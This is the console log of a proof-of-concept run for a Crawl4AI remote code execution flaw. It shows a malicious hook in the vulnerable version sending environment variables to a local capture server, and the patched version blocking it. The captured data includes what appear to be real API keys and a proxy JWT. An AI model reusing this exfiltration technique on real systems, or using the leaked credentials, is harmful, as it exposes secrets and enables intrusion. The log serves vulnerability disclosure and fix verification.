====================================================================== Crawl4AI RCE Vulnerability Demonstration CVE-2026-26216 / GHSA-5882-5rx9-xgxp ====================================================================== [+] Setting up environment with dummy secrets... - Set 5 sensitive environment variables [+] Starting exfiltration capture server on port 9999... - Log file: /tmp/exfil_b88v1ocw.log ====================================================================== TEST 1: Vulnerable Version (with __import__ in allowed_builtins) ====================================================================== [+] Testing VULNERABLE version (Crawl4AI < 0.8.0)... [+] Malicious hook executed successfully in vulnerable version [EXFILTRATION DATA FOUND IN LOGS]: ============================================================ [EXFIL] /exfil?env=%7B%27SHELL%27%3A%20%27/bin/bash%27%2C%20%27IS_SANDBOX%27%3A%20%27yes%27%2C%20%27COREPACK_ENABLE_AUTO_PIN%27%3A%20%270%27%2C%20%27PARALLEL_API_KEY%27%3A%20%27uw39o8UjBxRklmhr2r1tomTWuYgQc86USODaV1Dp%27%2C%20%27NVM_RC_VERSION%27%3A%20%27%27%2C%20%27CLAUDE_CODE_EMIT_TOOL_USE_SUMMARIES%27%3A%20%27true%27%2C%20%27PYTHONUNBUFFERED%27%3A%20%271%27%2C%20%27no_proxy%27%3A%20%27localhost%2C127.0.0.1%2C169.254.169.254%2Cmetadata.google.internal%2C%2A.svc.cluster.local%2C%2A.local%2C%2A.googleapis.com%2C%2A.google.com%27%2C%20%27GLOBAL_AGENT_HTTP_PROXY%27%3A%20%27http%3A//container_container_012gK3XT4PmteCHdkkSEShqR--claude_code_remote--d7a667%3Ajwt_eyJ0eXAiOiJKV1QiLCJhbGciOiJFUzI1NiIsImtpZCI6Iks3dlRfYUVsdXIySGdsYVJ0QWJ0UThDWDU4dFFqODZIRjJlX1VsSzZkNEEifQ.eyJpc3MiOiJhbnRocm9waWMtZWdyZXNzLWNvbnRyb2wiLCJvcmdhbml6YXRpb25fdXVpZCI6IjM3NjkzMGRiLTQ3NTItNGUxOS05NDM2LTM0MTZkOWE3MWY3NyIsImlhdCI6MTc3MTUyNzUxMSwiZXhwIjoxNzcxNTQxOTExLCJhbGxvd2VkX2hvc3RzIjoiKiIsImlzX2hpcGFhX3JlZ3VsYXRlZCI6ImZhbHNlIiwiaXNfYW50X2hpcGkiOiJmYWxzZSIsInVzZV9lZ3Jlc3NfZ2F0ZXdheSI6InRydWUiLCJzZXNzaW9uX2lkIjoic2Vzc2lvbl8wMVM0Z3hpUXpIelVzeWlwUHVtZ3Y5Sm4iLCJjb250YWluZXJfaWQiOiJjb250YWluZXJfMDEyZ0szWFQ0 [DATA] env={'SHELL': '/bin/bash', 'IS_SANDBOX': 'yes', 'COREPACK_ENABLE_AUTO_PIN': '0', 'PARALLEL_API_KEY': 'uw39o8UjBxRklmhr2r1tomTWuYgQc86USODaV1Dp', 'NVM_RC_VERSION': '', 'CLAUDE_CODE_EMIT_TOOL_USE_SUMMARIES' ============================================================ ====================================================================== TEST 2: Patched Version (without __import__ in allowed_builtins) ====================================================================== [+] Testing PATCHED version (Crawl4AI >= 0.8.0)... [+] Patched version correctly blocked: ImportError ====================================================================== RESULTS SUMMARY ====================================================================== [VULNERABILITY CONFIRMED] The vulnerable Crawl4AI version (< 0.8.0) allowed: 1. Arbitrary module import via __import__ builtin 2. System command execution through imported modules 3. Environment variable exfiltration Sensitive environment variables were successfully exfiltrated! Fix in version 0.8.0: - Removed __import__ from allowed_builtins in hook_manager.py - Hooks disabled by default (CRAWL4AI_HOOKS_ENABLED=false) Evidence logged to: /tmp/exfil_b88v1ocw.log